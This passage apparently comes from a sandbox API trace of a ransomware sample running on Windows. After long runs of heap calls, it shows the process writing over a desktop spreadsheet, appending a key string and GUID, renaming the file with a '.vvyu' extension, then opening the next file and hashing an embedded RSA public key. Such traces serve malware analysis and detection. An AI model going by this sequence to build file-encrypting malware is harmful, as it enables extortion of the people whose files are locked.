hHeap=0x620000) returned 1 [0191.977] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0d410 [0191.977] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0191.977] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2e912b0 [0191.977] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a610 [0191.977] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e94de0 [0191.977] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c934b0 [0191.977] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e94d98 [0191.977] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93480 [0191.977] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c934e0 [0191.977] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c934f8 [0191.977] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93450 [0191.977] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x2cff270 [0191.977] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x655b18 [0191.977] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x655b18, Size=0x218) returned 0x2e99d00 [0191.977] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x2e99f20 [0191.977] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c934e0 | out: hHeap=0x620000) returned 1 [0191.977] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93450 | out: hHeap=0x620000) returned 1 [0191.977] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c934f8 | out: hHeap=0x620000) returned 1 [0191.978] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cff270 | out: hHeap=0x620000) returned 1 [0191.978] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e99f20 | out: hHeap=0x620000) returned 1 [0191.978] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c934f8 [0191.978] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ac0 [0191.978] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c93450 [0191.978] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85da8 [0191.978] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x2c934e0 [0191.978] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ad0 [0191.978] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x2e914a8 [0191.978] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83cf0 [0191.978] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a670 [0191.978] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85dc8 [0191.978] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x2c998c8 [0191.978] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d88 [0191.979] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0191.979] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e914a8 | out: hHeap=0x620000) returned 1 [0191.979] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93450 | out: hHeap=0x620000) returned 1 [0191.979] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0191.979] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c934e0 | out: hHeap=0x620000) returned 1 [0191.979] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85da8 | out: hHeap=0x620000) returned 1 [0191.979] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0191.979] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c934f8 | out: hHeap=0x620000) returned 1 [0191.979] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0191.980] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a610 | out: hHeap=0x620000) returned 1 [0191.980] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e99d00 | out: hHeap=0x620000) returned 1 [0191.980] GetCurrentThreadId () returned 0x66c [0191.980] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95c90 [0191.980] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x64dde0 [0191.980] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x2cd95d8 [0191.980] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c168 [0191.980] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x2e93a80 [0191.980] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0191.980] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0191.980] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95ea0 [0191.980] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.981] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.981] GetCurrentThreadId () returned 0x66c [0191.981] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.982] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.982] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x2e914a8 [0191.982] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.982] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.982] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.982] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.983] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e914a8 | out: hHeap=0x620000) returned 1 [0191.983] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95d98 [0191.983] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0191.983] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x2ccadf0 [0191.983] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0191.983] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95fa8 [0191.983] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0191.983] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c934f8 [0191.983] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0191.983] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0191.983] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78aa0 [0191.983] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ab0 [0191.983] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a90 [0191.983] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0191.983] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0191.983] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0191.983] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c934e0 [0191.983] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0191.983] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78aa0 [0191.983] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0191.983] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0191.983] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b00 [0191.984] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b10 [0191.984] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78af0 [0191.984] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c93450 [0191.984] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b10 | out: hHeap=0x620000) returned 1 [0191.984] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85da8 [0191.984] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b00 | out: hHeap=0x620000) returned 1 [0191.984] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93498 [0191.984] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78af0 | out: hHeap=0x620000) returned 1 [0191.984] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c93510 [0191.984] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0191.984] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ae0 [0191.984] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0191.984] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c934c8 [0191.984] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0191.984] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93570 [0191.984] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0191.984] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c93528 [0191.984] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93570 | out: hHeap=0x620000) returned 1 [0191.984] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c93570 [0191.984] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c934c8 | out: hHeap=0x620000) returned 1 [0191.984] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ab0 [0191.984] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0191.984] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d48 [0191.985] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0191.985] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x2e83cf0 [0191.985] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c934e0 | out: hHeap=0x620000) returned 1 [0191.985] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c934e0 [0191.985] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0191.985] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x2e99d00 [0191.985] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c934f8 | out: hHeap=0x620000) returned 1 [0191.985] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99af8 [0191.985] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93528 | out: hHeap=0x620000) returned 1 [0191.985] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x2e99f10 [0191.985] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0191.985] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x2e914a8 [0191.985] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0191.985] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99c10 [0191.985] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c934e0 | out: hHeap=0x620000) returned 1 [0191.985] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x2e9a128 [0191.985] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0191.986] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95b88 [0191.986] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0191.986] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c168 | out: hHeap=0x620000) returned 1 [0191.986] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95d98 | out: hHeap=0x620000) returned 1 [0191.987] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95b88 | out: hHeap=0x620000) returned 1 [0191.987] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d48 | out: hHeap=0x620000) returned 1 [0191.987] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0191.987] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e99f10 | out: hHeap=0x620000) returned 1 [0191.988] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9a128 | out: hHeap=0x620000) returned 1 [0191.988] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e914a8 | out: hHeap=0x620000) returned 1 [0191.988] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0191.988] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93570 | out: hHeap=0x620000) returned 1 [0191.988] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0191.988] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93510 | out: hHeap=0x620000) returned 1 [0191.988] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85da8 | out: hHeap=0x620000) returned 1 [0191.988] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93450 | out: hHeap=0x620000) returned 1 [0191.988] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93498 | out: hHeap=0x620000) returned 1 [0191.989] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e93a80 | out: hHeap=0x620000) returned 1 [0191.989] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd95d8 | out: hHeap=0x620000) returned 1 [0191.989] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95ea0 | out: hHeap=0x620000) returned 1 [0191.989] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93480 | out: hHeap=0x620000) returned 1 [0191.990] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e94d98 | out: hHeap=0x620000) returned 1 [0191.990] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e99d00 | out: hHeap=0x620000) returned 1 [0191.990] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95fa8 | out: hHeap=0x620000) returned 1 [0191.990] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccadf0 | out: hHeap=0x620000) returned 1 [0191.991] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0191.991] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85dc8 | out: hHeap=0x620000) returned 1 [0191.991] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0191.991] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0191.991] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a670 | out: hHeap=0x620000) returned 1 [0191.991] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0191.992] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0191.992] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0d410 | out: hHeap=0x620000) returned 1 [0191.992] WriteFile (in: hFile=0x568, lpBuffer=0x2e96a68*, nNumberOfBytesToWrite=0x3289, lpNumberOfBytesWritten=0x312fb14, lpOverlapped=0x0 | out: lpBuffer=0x2e96a68*, lpNumberOfBytesWritten=0x312fb14*=0x3289, lpOverlapped=0x0) returned 1 [0191.993] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e96a68 | out: hHeap=0x620000) returned 1 [0191.993] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0x328e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0191.993] WriteFile (in: hFile=0x568, lpBuffer=0x2e95c90*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2e95c90*, lpNumberOfBytesWritten=0x312fb50*=0x100, lpOverlapped=0x0) returned 1 [0191.993] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95c90 | out: hHeap=0x620000) returned 1 [0191.994] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0191.994] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x2e96a68 [0191.994] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2e96a68, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0191.994] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x2e96e98 [0191.994] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e96a68 | out: hHeap=0x620000) returned 1 [0191.994] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0191.994] WriteFile (in: hFile=0x568, lpBuffer=0x2e96e98*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2e96e98*, lpNumberOfBytesWritten=0x312fb50*=0x28, lpOverlapped=0x0) returned 1 [0191.995] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e96e98 | out: hHeap=0x620000) returned 1 [0191.995] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0191.995] WriteFile (in: hFile=0x568, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x312fb50*=0x26, lpOverlapped=0x0) returned 1 [0191.995] CloseHandle (hObject=0x568) returned 1 [0191.996] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0191.996] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x2e96a68 [0191.996] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0191.997] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Desktop\\1IkZJVoATh.xls" (normalized: "c:\\users\\keecfmwgj\\desktop\\1ikzjvoath.xls"), lpNewFileName="C:\\Users\\kEecfMwgj\\Desktop\\1IkZJVoATh.xls.vvyu" (normalized: "c:\\users\\keecfmwgj\\desktop\\1ikzjvoath.xls.vvyu")) returned 1 [0191.999] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e96a68 | out: hHeap=0x620000) returned 1 [0191.999] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0191.999] VirtualFree (lpAddress=0x2900000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0192.002] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4658 | out: hHeap=0x620000) returned 1 [0192.002] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9a50e580, ftCreationTime.dwHighDateTime=0x1d89ae9, ftLastAccessTime.dwLowDateTime=0x426f2670, ftLastAccessTime.dwHighDateTime=0x1d89b4c, ftLastWriteTime.dwLowDateTime=0x426f2670, ftLastWriteTime.dwHighDateTime=0x1d89b4c, nFileSizeHigh=0x0, nFileSizeLow=0x5bcc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="2twJZ0dzmRfJrmP6B.mp3", cAlternateFileName="2TWJZ0~1.MP3")) returned 1 [0192.002] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e94d98 [0192.003] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7cd50 [0192.003] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e94d98 | out: hHeap=0x620000) returned 1 [0192.003] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Desktop\\2twJZ0dzmRfJrmP6B.mp3") returned=".mp3" [0192.003] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\2twJZ0dzmRfJrmP6B.mp3" (normalized: "c:\\users\\keecfmwgj\\desktop\\2twjz0dzmrfjrmp6b.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x568 [0192.003] GetFileSizeEx (in: hFile=0x568, lpFileSize=0x312fb40 | out: lpFileSize=0x312fb40*=23500) returned 1 [0192.004] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2900000 [0192.006] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0x5ba6, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0192.006] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x312fb78, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb78*=0x26, lpOverlapped=0x0) returned 1 [0192.008] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0192.009] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0192.009] SetFilePointer (in: hFile=0x568, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0192.009] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x312fb70, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb70*=0x5bcc, lpOverlapped=0x0) returned 1 [0192.010] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0192.010] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f1) returned 0x2e912b0 [0192.010] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0192.010] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0192.010] CryptAcquireContextW (in: phProv=0x312fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x312fa50*=0x67c168) returned 1 [0192.011] CryptCreateHash (in: hProv=0x67c168, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x312fa58 | out: phHash=0x312fa58) returned 1 [0192.011] CryptHashData (hHash=0x2cfe140, pbData=0x2e912b0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0192.011] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x0, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x312fa54) returned 1 [0192.011] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x2c85dc8 [0192.011] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x2c85dc8, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x2c85dc8, pdwDataLen=0x312fa54) returned 1 